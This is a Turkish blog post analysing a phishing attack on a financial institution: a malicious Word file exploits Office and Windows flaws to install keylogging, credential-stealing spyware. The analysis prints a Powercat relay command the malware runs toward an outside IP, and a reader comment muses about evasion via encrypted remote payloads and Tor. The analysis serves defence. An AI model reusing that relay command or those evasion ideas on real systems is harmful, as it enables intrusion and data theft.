Yakından da Yakın!

If you are looking for an English version of this article, please visit here.

Dijital çağ öncesinde de dijital çağda da, benim de sıklıkla güvenlik farkındalığı sunumlarımda ve blog yazılarımda yer verdiğim Willie Sutton gibi bir zamana damgasını vurmuş banka soyguncularının hayatlarını incelediğinizde, banka soygunlarının ana sebebinin değişmediğini görebiliyorsunuz, para! Geçmiş yılların silahlı soygunlarının siber banka soygunlarına dönüştüğü günümüzde, banka şubelerinin güvenliğinde bankalar için vazgeçilmez olan güvenlik görevlilerinin yanına siber güvenlik uzmanlarının da eklenmesi, dijital çağda siber soygunlarla mücadeleye karşı önemli bir rol oynamaya başladı. Bankaların fiziksel güvenlik adına banka soygunlarından çıkardığı dersler de yerini, siber tehdit raporlarından ve hacklenen bankalardan çıkardıkları derslere bıraktı.

FireEye (Mandiant) firması tarafından Mart ayında yayınlanan M-Trends raporunun finans kurumlarımız tarafından dikkatli ele alınması ve iyi bir şekilde etüt edilmesi gerekiyor. Özellikle dünya genelinde siber suç çetelerinin bankalara yönelik gerçekleştirdikleri siber saldırılarda, devlet destekli (nation state) siber saldırılarda sıkça gördüğümüz 0. gün zafiyetlerinden faydalanıyor olmaları, bu rapora damgasını vuran en önemli tespitlerden sadece biri diyebiliriz.

Bu tür tehdit raporlarını okuyan kimi kurumlar, tehdidin kendilerine oldukça uzak olduğunu düşünerek, insana ve güvenlik teknolojilerine yapılması gereken yatırımları ikinci plana atarak, hacklenene dek huzur ve mutluluk içinde hayatlarına devam ederler. Etrafındaki olup bitene seyirci kalmayıp, tehditleri yakından takip edip, analiz eden kurumlar ise, bu tür tehdit raporlarından da faydalanarak gelecek yıllarda siber güvenlik üzerine izleyecekleri stratejiyi belirleyip, kaynaklarını doğru alanlara yatırım yapmak için kullanarak hacklenme ihtimallerini olabildiğince azaltmaya çalışırlar.

Bu hikaye, hem M-Trends raporunda (sayfa 11) hem de Bir APT Girişimi başlıklı blog yazımda olduğu gibi yine bir üniversite e-posta hesabından gönderilen bir e-posta ile başlar. Alınan önlemler sayesinde hedef kişiye ulaşamayan bu e-posta, FireEye güvenlik sistemi başta olmak üzere çok sayıda sistemde alarmları tetikleyerek şüpheli e-postanın ekinde yer alan zararlı Office dosyasının (Confirmation_letter.docx MD5:2abe3cc4bff46455a945d56c27e9fb45) kurumsal SOME ekibi tarafından manuel olarak incelenmesi sürecini başlatır. Bu defa art niyetli kişiler daha önceki hikayede olduğu gibi üniversitedeki bir akademisyenin e-posta hesabını ele geçirip onun üzerinden ilerlemek yerine yine, yine aynı üniversiteden gönderiliyormuş süsü verdikleri sahte (spoofed) bir e-posta adresinden ([email protected]) e-posta göndermeyi tercih etmişlerdi. E-postada adı geçen kişinin üniversitenin personel listesinde yer almaması ve Linkedin üzerinde yapılan bir araştırmada da bu kişinin (Matteo Salvalaggio) farklı bir üniversitede çalışıyor olması şüpheleri arttırıyordu.

Financial APT
Financial APT

Gönderilen Word dosyasını sanal makinede açmaya çalıştığınızda, sistemin ağırlaşması ve yanıt veremez hale gelmesi, bu dokümanda bir istismar kodu olduğu şüphesini akıllara getiriyordu. Pestudio aracı ile temel birkaç kontrol yapıldığında ise 2015 yılında Microsoft Office yazılımında tespit edilen ve 2007’den 2016’ya kadar tüm sürümleri etkileyen ciddi bir zafiyeti (CVE-2015-2545 / MS15-099) istismar etmeye çalıştığı anlaşılıyordu.

Financial APT
Financial APT
Financial APT

Confirmation_letter.docx dosyasını 7-zip aracı ile açtıktan sonra zafiyete konu olan EPS dosyasını (image1.eps) bulmak çok zor değildi.

Financial APT
Financial APT

EPS dosyasını Notepad++ aracı ile incelediğimde, istismar kodu içinde yer alan birden fazla yürütülebilir dosya (executable – binary) başlıkları (MZ – 4D5A) hemen dikkatimi çekti. Bu tespit, istismar kodu içinde birden fazla yürütülebilir dosya (executable) olduğunu ve zafiyet başarıyla istismar edildikten sonra işletim sistemi üzerinde bunların çalıştırılacağına işaret ediyordu.

Financial APT
Financial APT
Financial APT

İstismar kodu ile zaman kaybetmeyip, MZ başlığına sahip tüm blokları ayrı ayrı apt1.exe, apt2.exe, apt3.exe vb. adı altında diske kayıt edip pestudio ile incelemeye başladım. apt3.exe (ekran görüntüsünde a3.exe olarak da yer almaktadır.) ve apt5.exe (ekran görüntüsünde a5.exe olarak da yer almaktadır.) dosyalarını incelediğimde, karakter dizilerinde (strings) yer alan Exploit anahtar kelimeleri, iki dosyanın birbirine fazlasıyla benzemesi (a3 32bit, a5 64bit) ve VirusTotal raporunda yer alan CVE-2016-7255 (MS16-135) çıktısı dikkatimi çekti. İki dosyayı da inceledikten sonra bunun Fancy Bear, APT28, Sofacy, STRONTIUM adıyla da bilinen Pawn Storm APT grubu tarafından da zamanında kullanılmış olan ve Windows kernel zafiyetini istismar eden bir istismar kodu olduğu ortaya çıktı.

Financial APT
Financial APT
Financial APT
Financial APT

Tabii bu iki istismar kodunun nihai amacı, EPS dosyası içinde yer alan zararlı yazılım kodunu sistem üzerinde yönetici yetkisi ile çalıştırmak olduğu için dinamik analiz için apt1.exe dosyasını öncelikle sanal makinede çalıştırmaya ve davranışını izlemeye karar verdim. apt1.exe dosyasını çalıştırdıktan kısa bir süre sonra kendisini %AppData%\AMD\OGLCache.exe klasörüne kopyaladığını, 84.202.2.12 ip adresi ile şifreli olarak haberleştiğini, AMD klasöründe default.conf adı altında içeriği okunaklı olmayan (rastgele oluşturulan bir isim, dosyanın çalıştırılma tarihi şifreli yazılıyor.) bir dosya oluşturduğunu, sistem yeniden başladığında çalışabilmek için klasör bilgisini HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Lollipop anahtarına yazdığını gördüm. Pestudio aracı ile OGLCache.exe aracını incelediğimde ise paketlenmiş (packed) olduğu için statik analizden elle tutulur pek bir bilgi elde edemedim.

Financial APT
Financial APT
Financial APT
Financial APT
Financial APT

Daha sonra statik analizden WriteProcessMemory fonksiyonunu _riteProcessMemory değiştirerek kendini gizlemeye çalışıp, sistem üzerinde çalıştırıldıktan sonra GetLongPathNameA fonksiyonunu çok defa çağırarak dinamik kod analizini zorlaştırmaya çalışan bir paketleyici (packet) ile paketlenmiş olan OGLCache.exe programını paketinden çıkardım. Pestudio ile incelediğimde bu defa haberleştiği ip adresinin yanı sıra, Powercat aracına dair karakter dizileri (strings) ve tuş kaydı yaptığına dair ipuçları elde ettim. Ayrıca hyd7u5jdi8 karakter dizisinden yola çıkarak art niyetli kişilerin bu zararlı yazılımı Ağustos 2016’dan beri aktif olarak kullandıklarını tespit ettim.

Financial APT
Financial APT
Financial APT
Financial APT
Financial APT
Financial APT

Dinamik kod analizine devam ettiğimde, çalışan işlemler (process) arasında ns.exe isimli (Norton Security olduğunu tahmin ediyorum.) işlemi gördüğünde, %TEMP% klasörüne oluşturduğu loopc.cmd isimli toplu işlem dosyası (batch) ile Powercat aracını çalıştırarak (powercat -l -p 4000 -r tcp:84.200.2.12:443;) 4000. bağlantı noktası (port) ile 84.200.2.12 ip adresine 443. bağlantı noktası arasında relay yapabildiğini gördüm. Asıl amacım, zararlı yazılımın çekirdeğine yani tüm fonksiyonların çağrıldığı ana fonksiyona ulaşmak ve zararlı yazılımın yeteneklerini öğrenmek olduğu için analiz etmeye devam ettim. Fonksiyonlar arası gezinirken çok geçmeden IDA’nın grafik görünümü ile 00405AB3 adresindeki ana fonksiyona ulaştım. Bu fonksiyon altından çağrılan diğer fonksiyonlara hızlıca baktığımda bunun uzaktan sistemi yönetmeye imkan tanıyan ve buna ilaveten tuş kaydı yapabilen, ekran görüntüsü alabilen ve Outlook, Thunderbird profillerinde yer alan kullanıcı adı ve parola bilgilerini de çalabilen bir casus yazılım olduğunu öğrenmiş oldum.

Financial APT
Financial APT
Financial APT
Financial APT

Analizimi tamamlamadan önce zararlı yazılımda yer alan fakat analizim süresince devreye girmeyen tuş kaydından sorumlu olan fonksiyonu bulup, hızlıca göz atmaya karar verdim. 0041572C adresinde yer alan tuş kaydından sorumlu olan fonksiyonu tespit ettikten sonra programın akışını değiştirerek, akışın bu fonksiyona devam etmesini sağladım. Ardından sistem üzerinde bastığım her tuşun (AAAAAAAAAAAAA…), AMD klasöründe dosya adı tarihten oluşan bir dosyaya (-08-03-2017) kayıt edildiğini gördüm. Okunaklı olmayan bir dosyanın şifrelemesini de çözmek için fonksiyona kısaca göz attığımda, dosyaya yazılan her bir baytın ilk olarak 9D hex değeri ile XOR işleminden geçirilip ardından da çıkan değere 36 sayısının eklediğini gördüm. Hex Workshop Hex Editor aracı ile tuş kaydının saklandığı dosyada ters işlem (-36 ^ 9D) yaptığımda ise okunaklı olmayan bastığım tuş bilgilerini okunaklı hale çevirebildim.

Financial APT
Financial APT
Financial APT
Financial APT

Sonuç itibariyle organize siber suç çetelerinin hedef aldıkları kurumlara saldırırken devlet destekli (nation state) siber saldırganlardan çok da geri kalmadıklarını görebiliyoruz. Çıtayı her daim yükseltelen siber saldırganlarla mücadele adına FireEye (Mandiant)‘ın da raporunda yer verdiği üzere özellikle finans kurumlarının güvenlik ve insan yatırımlarını arttırmaları büyük önem kazanıyor. Son olarak eski FBI başkanı Robert Miller’ın “Dünyada iki çeşit kurum var; Bir, hacklenenler, iki, hacklenecek olanlar” sözünü hatırlatarak, bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.

Not:

  • Bu yazıya konu olan APT grubu henüz bilinmemekte olup, konu olan zararlı yazılım ise FireEye firmasının Mayıs ayında yayınlamış olduğu EPS Processing Zero-Days Exploited by Multiple Threat Actors blog yazısında NETWIRE olarak isimlendirilmiştir.
  • Bu yazı ayrıca Pi Hediyem Var #11 oyununun çözüm yolunu da içermektedir.
  • Financial APT
    Financial APT
    Financial APT
    Financial APT
    Financial APT

    image_pdfShow this post in PDF formatimage_printPrint this page
    11 comments
    1. çok başarılı bir çalışma olmuş elinize kolunuza sağlık. fakat şunu anlayamıyorum bunu yapanlar dinamik ve statik kod analizini engellemek için neden çalıştırılması gereken kodları uzak sunucudan şifreli olarak çekip şifreli halde belleğe atıp bellekte karmaşık halde dağıtıp belirli zamana göre değişimle bayt bayt 9999 fake 1 gerçek olacak şekilde birleştirmiyorlar? bir de neden direkt açık olarak sunucu adresini ifşa ediyorlar tor kullanmak varken?
      saygılarımla

      1. Söylediklerinizin çoğu şüpheli aktivite olması sebebiyle güvenlik sistemlerinde çok sayıda alarma yol açıp, bloklanabileceği için dikkatleri üzerlerine çekmeme, engellenmeme adına bu tür ileri seviye yöntemleri izlemediklerini tahmin ediyorum.

    2. Emeğinize sağlık Hocam..Hep söylüyoruz ama yine söylemek durumundayız,gerçekten çok net, çok anlaşılır yazıyorsunuz ve inanılmaz faydalı görüyorum..Çok çok teşekkür ediyor,çalışmalarınızın devamını bekliyoruz.Saygılar

    Leave a Reply

    Your email address will not be published. Required fields are marked *

    You May Also Like
    Read More

    e-Devlet Hacklendi mi?

    If you are looking for an English version of this article, please visit here. Öncelikle yazının sonunda söyleyeceğimi başta söyleyeyim, “Hayır, hack-len-me-di!” Peki bu durumda vatandaş olarak rahat bir nefes alabilir misiniz ? Maalesef hayır. Bunun sebebini de yazının devamında okuyabilirsiniz. Zaman zaman hortlayan “e-Devlet Hacklendi!”, “e-Devlet verileri çalındı!”, “85…
    Read More
    Read More

    WhatsApp Dolandırıcıları

    If you are looking for an English version of this article, please visit here. Başlangıç Son günlerde hemen hemen WhatsApp uygulaması kullanan herkesi rahatsız eden yabancı cep telefonu numaralarından gelen çağrılardan, mesajlardan ben de yakın zamanda nasibimi aldım ve tabii ki diğer dolandırıcılıklarla ilgili yazılarımda (Kripto Para Dolandırıcıları, LinkedIn Dolandırıcıları,…
    Read More
    Read More

    LinkedIn Dolandırıcıları

    If you are looking for an English version of this article, please visit here. Uzun yıllardan beri sosyal ağları ve medyayı etkin kullanan bir siber güvenlik araştırmacısı olarak bağlantılarım arasında yer alanlarınız özellikle hafta içi LinkedIn ve Twitter üzerinden okuduğum ve beğendiğim siber güvenlik makalelerini, haberleri paylaştıklarımı farkediyorlardır. Twitter hesabımın…
    Read More
    Read More

    e-Devlet Hesaplarımızı Nasıl Hackliyorlar?

    If you are looking for an English version of this article, please visit here. Başlangıç 25 Ekim 2023 günü saat 11:46’da e-Devlet uygulamasından ve e-posta adresime gelen uyarılardan e-Devlet Kapısı hesabıma üst üste birden fazla defa yanlış parola ile giriş yapılmaya çalışıldığı için hesabımın bir saatliğine geçici olarak kullanıma kapatıldığını…
    Read More